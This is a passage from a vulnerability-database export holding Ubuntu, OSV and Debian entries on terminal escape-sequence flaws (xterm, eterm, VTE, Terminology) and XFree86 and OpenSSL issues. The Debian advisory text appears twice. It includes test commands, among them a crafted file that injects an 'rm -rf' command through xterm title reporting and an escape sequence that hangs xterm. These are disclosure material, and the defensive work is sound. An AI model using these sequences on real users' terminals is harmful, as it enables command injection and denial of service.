"exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0071"], "modified": "2003-03-03T00:00:00", "id": "UB:CVE-2003-0071", "href": "https://ubuntu.com/security/CVE-2003-0071", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-11-28T16:09:17", "description": "", "cvss3": {}, "published": "2003-03-18T00:00:00", "type": "ubuntucve", "title": "CVE-2003-0020", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0020"], "modified": "2003-03-18T00:00:00", "id": "UB:CVE-2003-0020", "href": "https://ubuntu.com/security/CVE-2003-0020", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-28T16:09:16", "description": "", "cvss3": {}, "published": "2003-03-03T00:00:00", "type": "ubuntucve", "title": "CVE-2003-0066", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0066"], "modified": "2003-03-03T00:00:00", "id": "UB:CVE-2003-0066", "href": "https://ubuntu.com/security/CVE-2003-0066", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T16:09:17", "description": "", "cvss3": {}, "published": "2003-03-03T00:00:00", "type": "ubuntucve", "title": "CVE-2003-0063", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0063"], "modified": "2003-03-03T00:00:00", "id": "UB:CVE-2003-0063", "href": "https://ubuntu.com/security/CVE-2003-0063", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T15:48:17", "description": "The vte_sequence_handler_window_manipulation function in vteseq.c in libvte\n(aka libvte9) in VTE 0.25.1 and earlier, as used in gnome-terminal, does\nnot properly handle escape sequences, which allows remote attackers to\nexecute arbitrary commands or obtain potentially sensitive information via\na (1) window title or (2) icon title sequence. NOTE: this issue exists\nbecause of a CVE-2003-0070 regression.", "cvss3": {}, "published": "2010-07-16T00:00:00", "type": "ubuntucve", "title": "CVE-2010-2713", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0070", "CVE-2010-2713"], "modified": "2010-07-16T00:00:00", "id": "UB:CVE-2010-2713", "href": "https://ubuntu.com/security/CVE-2010-2713", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T15:04:31", "description": "Terminology 0.7.0 allows remote attackers to execute arbitrary commands via\nescape sequences that modify the window title and then are written to the\nterminal, a similar issue to CVE-2003-0063.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=843434>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-23T00:00:00", "type": "ubuntucve", "title": "CVE-2015-8971", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0063", "CVE-2015-8971"], "modified": "2017-01-23T00:00:00", "id": "UB:CVE-2015-8971", "href": "https://ubuntu.com/security/CVE-2015-8971", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-07-13T05:51:40", "description": "\nFour vulnerabilities have been discovered in XFree86.\n\n\n* [CAN-2003-0063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0063)\n- xterm window title reporting escape sequence can deceive user\n\nThe xterm package provides a terminal escape sequence that reports\n the window title by injecting it into the input buffer of the\n terminal window, as if the user had typed it. An attacker can craft\n an escape sequence that sets the title of a victim's xterm window to\n an arbitrary string (such as a shell command) and then reports that\n title. If the victim is at a shell prompt when this is done, the\n injected command will appear on the command line, ready to be run.\n Since it is not possible to embed a carriage return in the window\n title, the attacker would have to convince the victim to press Enter\n (or rely upon the victim's careless or confusion) for the shell or\n other interactive process to interpret the window title as user\n input. It is conceivable that the attacker could craft other escape\n sequences that might convince the victim to accept the injected\n input, however. The Common Vulnerabilities and Exposures project at\n cve.mitre.org has assigned the name\n [CAN-2003-0063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0063)\n to this issue.\n\n\nTo determine whether your version of xterm is vulnerable to abuse of\n the window title reporting feature, run the following command at a\n shell prompt from within an xterm window:\n\n\n\n echo -e \"\\e[21t\"\n\n(The terminal bell may ring, and the window title may be prefixed\n with an \"l\".)\n\n\nThis flaw is exploitable by anything that can send output to a\n terminal window, such as a text document. The xterm user has to\n take action to cause the escape sequence to be sent, however (such\n as by viewing a malicious text document with the \"cat\" command).\n Whether you are likely to be exposed to it depends on how you use\n xterm. Consider the following:\n\n\n\n echo -e '\\e]2;s && echo rm -rf \\*\\a' > /tmp/sploit\n echo -e '\\e[21t' >> /tmp/sploit\n cat /tmp/sploit\n\nDebian has resolved this problem by disabling the window title\n reporting escape sequence in xterm; it is understood but ignored.\n The escape sequence to set the window title has not been disabled.\n\n\nA future release of the xterm package will have a configuration\n option to permit the user to turn the window title reporting feature\n back on, but it will default off.\n* [CAN-2003-0071](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0071)\n- xterm susceptible to DEC UDK escape sequence denial-of-service attack\n\nThe xterm package, since it emulates DEC VT-series text terminals,\n emulates a feature of DEC VT terminals known as \"User-Defined Keys\"\n (UDK for short). There is a bug in xterm's handling of DEC UDK\n escape sequences, however, and an ill-formed one can cause the xterm\n process to enter a tight loop. This causes the process to \"spin\",\n consuming CPU cycles uselessly, and refusing to handle signals (such\n as efforts to kill the process or close the window).\n\n\nTo determine whether your version of xterm is vulnerable to this\n attack, run the following command at a shell prompt from within a\n \"sacrificial\" xterm window (i.e., one that doesn't have anything in\n the scrollback buffer you might need to see later):\n\n\n\n echo -e \"\\eP0;0|0A/17\\x9c\"\n\nThis flaw is exploitable by anything that can send output to a\n terminal window, such as a text document. The xterm user has to\n take action to cause the escape sequence to be sent, however (such\n as by viewing a malicious text document with the \"cat\" command).\n Whether you are likely to be exposed to it depends on how you use\n xterm.\n\n\nDebian has resolved this problem by backporting an upstream fix\n to XFree86 4.1.0.\n* [CAN-2002-0164](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0164)\n- flaw in X server's MIT-SHM extension permits user owning X session to read\nand write arbitrary shared memory segments\n\nMost X servers descended from the MIT/X Consortium/X.Org Sample\n Implementation, including XFree86's X servers, support an extension\n to the X protocol called MIT-SHM, which enables X clients running on\n the same host as the X server to operate more quickly and\n efficiently by taking advantage of an operating system feature\n called shared memory where it is available. The Linux kernel, for\n example, supports shared memory.\n\n\nBecause the X server runs with elevated privileges, the operating\n system's built-in access control mechanisms are ineffective to\n police the X server's usage of segments of shared memory. The X\n server has to implement its own access control. This was\n imperfectly done in previous releases of XFree86 (and the MIT/X\n Consortium/X.Org Sample Implementation before it), leaving\n opportunities for malicious X clients to read and alter shared\n memory segments to which they should not have access. The Common\n Vulnerabilities and Exposures project at cve.mitre.org has assigned\n the name\n [CAN-2002-0164](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0164)\n to this issue.\n\n\nDebian's XFree86 4.1.0-16 packages shipped with an incomplete fix\n for the this flaw, only enforcing proper access control for X\n servers that were not started by a display manager (e.g., xdm).\n This update resolves that problem.\n\n\nThe Debian Project knows of no exploits for this vulnerability. A\n malicious X client that abused the MIT-SHM extension could\n conceivably be written however, and run (deliberately or\n unwittingly) by a user able to run an X server on a host. The\n impact of this flaw depends on how shared memory is used on the\n system. See the ipcs(8) manual page for more information.\n\n\nDebian has resolved this problem by backporting an upstream fix to\n XFree86 4.1.0.\n* [CAN-2003-0730](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0730)\n- multiple integer overflows in the font libraries for XFree86 allow local or\nremote attackers to cause a denial of service or execute arbitrary code via\nheap-based and stack-based buffer overflow attacks\n\nSecurity researcher \"blexim\" wrote [paraphrased]:\n\n\n\n> \n> I have identified several bugs in the font libraries of the\n> current version of the XFree86 source code. These bugs could\n> potentially lead to the execution of arbitrary code by a remote\n> user in any process which calls the functions in question. The\n> functions are related to the transfer and enumeration of fonts\n> from font servers to clients, limiting the range of the exposure\n> caused by these bugs.\n> \n> \n> Specifically, several sizing variables passed from a font server\n> to a client are not adequately checked, causing calculations on\n> them to result in erroneous values. These erroneous calculations\n> can lead to buffers on the heap and stack overflowing, potentially\n> leading to arbitrary code execution. As stated before, the risk\n> is limited by the fact that only clients can be affected by these\n> bugs, but in some (non-default) configurations, both xfs and the X\n> server can act as clients to remote font servers. In these\n> configurations, both xfs and the X server could be potentially\n> compromised.\n> \n> \n> \n\n\nThe Common Vulnerabilities and Exposures project at cve.mitre.org\n has assigned the name\n [CAN-2003-0730](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0730)\n to this issue.\n\n\nThe Debian Project knows of no exploits for this vulnerability. By\n default in Debian, X servers are configured to listen only to a\n locally-running font server, which is not even used if the xfs\n package is not installed. The Debian default configuration of xfs\n uses only font directories on the local host, and does not attempt\n to connect to any external font servers.\n\n\nDebian has resolved this problem by backporting an upstream fix to\n XFree86 4.1.0.\n\n\nAll of the above problems also affect the xfree86v3 packages (in the\ncase of the first two flaws, the xterm source code contains the flaws,\nbut no xterm package is produced). Due to resource limitations and a\nlack of upstream support for this legacy code, Debian is unable to\ncontinue supporting version 3.3.6 of XFree86. To avoid exposure to\nthe latter two flaws in this advisory, we recommend that you remove\nthe following packages if you have them installed:\n\n\n* xserver-3dlabs\n* xserver-8514\n* xserver-agx\n* xserver-common-v3\n* xserver-fbdev\n* xserver-i128\n* xserver-mach32\n* xserver-mach64\n* xserver-mach8\n* xserver-mono\n* xserver-p9000\n* xserver-s3\n* xserver-s3v\n* xserver-svga\n* xserver-tga\n* xserver-vga16\n* xserver-w32\n\n\n(You may also wish to remove the xext, xlib6, and xlib6-altdev packages,\nas support for them is being terminated along with the rest of the\nXFree86 3.3.6 packages, though they are not affected by the flaws in\nthis advisory.)\n\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 4.1.0-16woody1.\n\n\nFor the unstable distribution (sid) all problems except\n[CAN-2003-0730](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0730)\nare fixed in version 4.2.1-11.\n[CAN-2003-0730](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0730)\nwill be fixed in 4.2.1-12, currently in preparation.\n\n\nWe recommend that you update your xfree86 package.\n\n\n", "cvss3": {}, "published": "2003-09-12T00:00:00", "type": "osv", "title": "xfree86 - buffer overflows, denial of service", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0071", "CVE-2003-0063", "CVE-2003-0730", "CVE-2002-0164"], "modified": "2019-03-31T21:35:49", "id": "OSV:DSA-380", "href": "https://osv.dev/vulnerability/DSA-380", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-12T05:43:06", "description": "\nH.D. Moore discovered several terminal emulator security issues. One\nof them covers escape codes that are interpreted by the terminal\nemulator. This could be exploited by an attacker to insert malicious\ncommands hidden for the user, who has to hit enter to continue, which\nwould also execute the hidden commands.\n\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 0.9.2-0pre2002042903.3.\n\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 0.9.2-6.\n\n\nWe recommend that you upgrade your eterm package.\n\n\n", "cvss3": {}, "published": "2004-04-29T00:00:00", "type": "osv", "title": "eterm - missing input sanitising", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0068"], "modified": "2014-04-29T17:19:40", "id": "OSV:DSA-496", "href": "https://osv.dev/vulnerability/DSA-496", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-12T05:41:09", "description": "\nA vulnerability has been discovered in OpenSSL, a Secure Socket Layer\n(SSL) implementation. In an upcoming paper, Brice Canvel (EPFL),\nAlain Hiltgen (UBS), Serge Vaudenay (EPFL), and Martin Vuagnoux (EPFL,\nIlion) describe and demonstrate a timing-based attack on CBC cipher\nsuites used in SSL and TLS. OpenSSL has been found to be vulnerable to\nthis attack.\n\n\nFor the stable distribution (woody) this problem has been\nfixed in version 0.9.6c-2.woody.2.\n\n\nFor the old stable distribution (potato) this problem has been fixed\nin version 0.9.6c-0.potato.5. Please note that this updates the\nversion from potato-proposed-updates that supersedes the version in\npotato.\n\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 0.9.7a-1.\n\n\nWe recommend that you upgrade your openssl packages.\n\n\n", "cvss3": {}, "published": "2003-02-24T00:00:00", "type": "osv", "title": "openssl - information leak", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0078"], "modified": "2014-04-29T17:19:40", "id": "OSV:DSA-253", "href": "https://osv.dev/vulnerability/DSA-253", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-05T02:32:15", "description": "### Impact\n\nMutagen command line operations, as well as the log output from `mutagen daemon run`, are susceptible to control characters that could be provided by remote endpoints. This can cause terminal corruption, either intentional or unintentional, if these characters are present in error messages, file paths/names, and/or log output. This could be used as an attack vector if synchronizing with an untrusted remote endpoint, synchronizing files not under control of the user, or forwarding to/from an untrusted remote endpoint. On very old systems with terminals susceptible to issues such as [CVE-2003-0069](https://nvd.nist.gov/vuln/detail/CVE-2003-0069), the issue could theoretically cause code execution.\n\n\n### Patches\n\nThe problem has been patched in Mutagen v0.16.6 and v0.17.1. Earlier versions of Mutagen are no longer supported and will not be patched. Versions of Mutagen after v0.18.0 will also have the patch merged.\n\nOne caveat is that the templating functionality of Mutagen's `list` and `monitor` commands has been only partially patched. In particular, the `json` template function already provided escaping and no patching was necessary. However, raw template output has been left unescaped because this raw output may be necessary for commands which embed Mutagen. To aid these commands, a new `shellSanitize` template function has been added which provides control character neutralization in strings.\n\n\n### Workarounds\n\nAvoiding synchronization of untrusted files or interaction with untrusted remote endpoints should mitigate any risk.\n\n\n### References\n\nA similar issue can be seen in kubernetes/kubernetes#101695.\n", "cvss3": {}, "published": "2023-05-05T02:25:00", "type": "osv", "title": "Mutagen list and monitor operations do not neutralize control characters in text controlled by remote endpoints", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0069", "CVE-2023-30844"], "modified": "2023-05-05T02:25:00", "id": "OSV:GHSA-JMP2-WC4P-WFH2", "href": "https://osv.dev/vulnerability/GHSA-jmp2-wc4p-wfh2", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2023-11-29T15:14:31", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 380-1 security@debian.org\nhttp://www.debian.org/security/ Matt Zimmerman\nSeptember 12th, 2003 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : xfree86\nVulnerability : buffer overflows, denial of service\nProblem-Type : remote\nDebian-specific: no\nCVE Ids : CAN-2003-0063 CAN-2003-0071 CAN-2002-0164 CAN-2003-0730\n\nFour vulnerabilities have been discovered in XFree86.\n\nCAN-2003-0063 - xterm window title reporting escape sequence can deceive user\n\n The xterm package provides a terminal escape sequence that reports\n the window title by injecting it into the input buffer of the\n terminal window, as if the user had typed it. An attacker can craft\n an escape sequence that sets the title of a victim's xterm window to\n an arbitrary string (such as a shell command) and then reports that\n title. If the victim is at a shell prompt when this is done, the\n injected command will appear on the command line, ready to be run.\n Since it is not possible to embed a carriage return in the window\n title, the attacker would have to convince the victim to press Enter\n (or rely upon the victim's careless or confusion) for the shell or\n other interactive process to interpret the window title as user\n input. It is conceivable that the attacker could craft other escape\n sequences that might convince the victim to accept the injected\n input, however. The Common Vulnerabilities and Exposures project at\n cve.mitre.org has assigned the name CAN-2003-0063 to this issue.\n\n To determine whether your version of xterm is vulnerable to abuse of\n the window title reporting feature, run the following command at a\n shell prompt from within an xterm window:\n\n echo -e "\\e[21t"\n\n (The terminal bell may ring, and the window title may be prefixed\n with an "l".)\n\n This flaw is exploitable by anything that can send output to a\n terminal window, such as a text document. The xterm user has to\n take action to cause the escape sequence to be sent, however (such\n as by viewing a malicious text document with the "cat" command).\n Whether you are likely to be exposed to it depends on how you use\n xterm. Consider the following:\n\n echo -e '\\e]2;s && echo rm -rf *\\a' > /tmp/sploit\n echo -e '\\e[21t' >> /tmp/sploit\n cat /tmp/sploit\n\n Debian has resolved this problem by disabling the window title\n reporting escape sequence in xterm; it is understood but ignored.\n The escape sequence to set the window title has not been disabled.\n\n A future release of the xterm package will have a configuration\n option to permit the user to turn the window title reporting feature\n back on, but it will default off.\n\nCAN-2003-0071 - xterm susceptible to DEC UDK escape sequence denial-of-service\n attack\n\n The xterm package, since it emulates DEC VT-series text terminals,\n emulates a feature of DEC VT terminals known as "User-Defined Keys"\n (UDK for short). There is a bug in xterm's handling of DEC UDK\n escape sequences, however, and an ill-formed one can cause the xterm\n process to enter a tight loop. This causes the process to "spin",\n consuming CPU cycles uselessly, and refusing to handle signals (such\n as efforts to kill the process or close the window).\n\n To determine whether your version of xterm is vulnerable to this\n attack, run the following command at a shell prompt from within a\n "sacrificial" xterm window (i.e., one that doesn't have anything in\n the scrollback buffer you might need to see later):\n\n echo -e "\\eP0;0|0A/17\\x9c"\n\n This flaw is exploitable by anything that can send output to a\n terminal window, such as a text document. The xterm user has to\n take action to cause the escape sequence to be sent, however (such\n as by viewing a malicious text document with the "cat" command).\n Whether you are likely to be exposed to it depends on how you use\n xterm.\n\n Debian has resolved this problem by backporting an upstream fix\n to XFree86 4.1.0.\n\nCAN-2002-0164 - flaw in X server's MIT-SHM extension permits user\n owning X session to read and write arbitrary shared memory segments\n\n Most X servers descended from the MIT/X Consortium/X.Org Sample\n Implementation, including XFree86's X servers, support an extension\n to the X protocol called MIT-SHM, which enables X clients running on\n the same host as the X server to operate more quickly and\n efficiently by taking advantage of an operating system feature\n called shared memory where it is available. The Linux kernel, for\n example, supports shared memory.\n\n Because the X server runs with elevated privileges, the operating\n system's built-in access control mechanisms are ineffective to\n police the X server's usage of segments of shared memory. Th X\n server has to implement its own access control. This was\n imperfectly done in previous releases of XFree86 (and the MIT/X\n Consortium/X.Org Sample Implementation before it), leaving\n opportunities for malicious X clients to read and alter shared\n memory segments to which they should not have access. The Common\n Vulnerabilities and Exposures project at cve.mitre.org has assigned\n the name CAN-2002-0164 to this issue.\n\n Debian's XFree86 4.1.0-16 packages shipped with an incomplete fix\n for the this flaw, only enforcing proper access control for X\n servers that were not started by a display manager (e.g., xdm).\n This update resolves that problem.\n\n The Debian Project knows of no exploits for this vulnerability. A\n malicious X client that abused the MIT-SHM extension could\n conceivably be written however, and run (deliberately or\n unwittingly) by a user able to run an X server on a host. The\n impact of this flaw depends on how shared memory is used on the\n system. See the ipcs(8) manual page for more information.\n\n Debian has resolved this problem by backporting an upstream fix to\n XFree86 4.1.0.\n\nCAN-2003-0730 - multiple integer overflows in the font libraries for\n XFree86 allow local or remote attackers to cause a denial of\n service or execute arbitrary code via heap-based and stack-based\n buffer overflow attacks\n\n Security researcher "blexim" wrote [paraphrased]:\n\n I have identified several bugs in the font libraries of the\n current version of the XFree86 source code. These bugs could\n potentially lead to the execution of arbitrary code by a remote\n user in any process which calls the functions in question. The\n functions are related to the transfer and enumeration of fonts\n from font servers to clients, limiting the range of the exposure\n caused by these bugs.\n\n Specifically, several sizing variables passed from a font server\n to a client are not adequately checked, causing calculations on\n them to result in erroneous values. These erroneous calculations\n can lead to buffers on the heap and stack overflowing, potentially\n leading to arbitrary code execution. As stated before, the risk\n is limited by the fact that only clients can be affected by these\n bugs, but in some (non-default) configurations, both xfs and the X\n server can act as clients to remote font servers. In these\n configurations, both xfs and the X server could be potentially\n compromised.\n\n The Common Vulnerabilities and Exposures project at cve.mitre.org\n has assigned the name CAN-2003-0730 to this issue.\n\n The Debian Project knows of no exploits for this vulnerability. By\n default in Debian, X servers are configured to listen only to a\n locally-running font server, which is not even used if the xfs\n package is not installed. The Debian default configuration of xfs\n uses only font directories on the local host, and does not attempt\n to connect to any external font servers.\n\n Debian has resolved this problem by backporting an upstream fix to\n XFree86 4.1.0.\n\nAll of the above problems also affect the xfree86v3 packages (in the\ncase of the first two flaws, the xterm source code contains the flaws,\nbut no xterm package is produced). Due to resource limitations and a\nlack of upstream support for this legacy code, Debian is unable to\ncontinue supporting version 3.3.6 of XFree86. To avoid exposure to\nthe latter two flaws in this advisory, we recommend that you remove\nthe following packages if you have them installed:\n\n\txserver-3dlabs\n\txserver-8514\n\txserver-agx\n\txserver-common-v3\n\txserver-fbdev\n\txserver-i128\n\txserver-mach32\n\txserver-mach64\n\txserver-mach8\n\txserver-mono\n\txserver-p9000\n\txserver-s3\n\txserver-s3v\n\txserver-svga\n\txserver-tga\n\txserver-vga16\n\txserver-w32\n\n(You may also wish to remove the xext, xlib6, and xlib6-altdev packages,\nas support for them is being terminated along with the rest of the\nXFree86 3.3.6 packages, though they are not affected by the flaws in\nthis advisory.)\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 4.1.0-16woody1.\n\nFor the unstable distribution (sid) all problems except CAN-2003-0730\nare fixed in version 4.2.1-11. CAN-2003-0730 will be fixed in\n4.2.1-12, currently in preparation.\n\nWe recommend that you update your xfree86 package.\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/x/xfree86/xfree86_4.1.0-16woody1.dsc\n Size/MD5 checksum: 1512 944b46135349c20bfcc29e70c48e3134\n http://security.debian.org/pool/updates/main/x/xfree86/xfree86_4.1.0-16woody1.diff.gz\n Size/MD5 checksum: 1596153 502185d1b3e5b517d6a9cda100597014\n http://security.debian.org/pool/updates/main/x/xfree86/xfree86_4.1.0.orig.tar.gz\n Size/MD5 checksum: 54433247 ea7a32e6a81a850e9f19428f3104c300\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/x/xfree86/x-window-system_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 59660 77a3d33f0adef1482433508fc2fe2572\n http://security.debian.org/pool/updates/main/x/xfree86/xfonts-100dpi-transcoded_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 8332974 61c2a42c2d5e668ab6adbaaff9da4c02\n http://security.debian.org/pool/updates/main/x/xfree86/xfonts-100dpi_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 4441766 a1980fa766907cd8c0137769378ce017\n http://security.debian.org/pool/updates/main/x/xfree86/xfonts-75dpi-transcoded_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 7224972 7672c6a1664634a543bee78dbd707f27\n http://security.debian.org/pool/updates/main/x/xfree86/xfonts-75dpi_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 3931002 ded7e9cf4ec402311366f3c16cf3b522\n http://security.debian.org/pool/updates/main/x/xfree86/xfonts-base-transcoded_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 1104714 0c310f293d5f18027b4f66d89e8c88a9\n http://security.debian.org/pool/updates/main/x/xfree86/xfonts-base_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 5028098 45d2fb54abcbc20a454c54d07fd87275\n http://security.debian.org/pool/updates/main/x/xfree86/xfonts-cyrillic_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 437850 a4b60c52f618daba56cb59422dca8e1e\n http://security.debian.org/pool/updates/main/x/xfree86/xfonts-pex_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 68210 9c70aea042a1bb6e3bb32a12f417e335\n http://security.debian.org/pool/updates/main/x/xfree86/xfonts-scalable_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 795574 2b51a0af0d69f6bfc7c9386926d3393b\n http://security.debian.org/pool/updates/main/x/xfree86/xfree86-common_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 545426 041abd5637b1dd4adb9461f1db4e8f54\n http://security.debian.org/pool/updates/main/x/xfree86/xlib6g-dev_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 59620 29a21611c82da8b2beac7b77a56c596f\n http://security.debian.org/pool/updates/main/x/xfree86/xlib6g_4.1.0-16woody1_all.deb\n Size/MD5 checksum: 59818 b6ac13562174e6071f8320aeb1abc0a5\n 